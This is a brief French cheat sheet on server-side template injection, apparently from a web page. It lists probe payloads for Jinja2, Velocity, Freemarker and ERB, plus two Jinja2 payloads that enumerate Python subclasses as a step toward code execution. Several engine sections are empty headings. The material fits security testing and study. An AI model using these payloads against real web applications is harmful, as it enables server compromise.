SSTI
Identification
Charges utiles courantes
{{7*7}} # Jinja2
${7*7} # Velocity
#{7*7} # Freemarker
<%= 7*7 %> # ERBDétection de SSTI
Exploitation
Jinja2 (Python)
{{ self.__class__.__mro__[1].__subclasses__() }}
{{ config.__class__.__mro__[1].__subclasses__() }}Twig (PHP)
Freemarker (Java)
ERB (Ruby)
Velocity (Java)
Mis à jour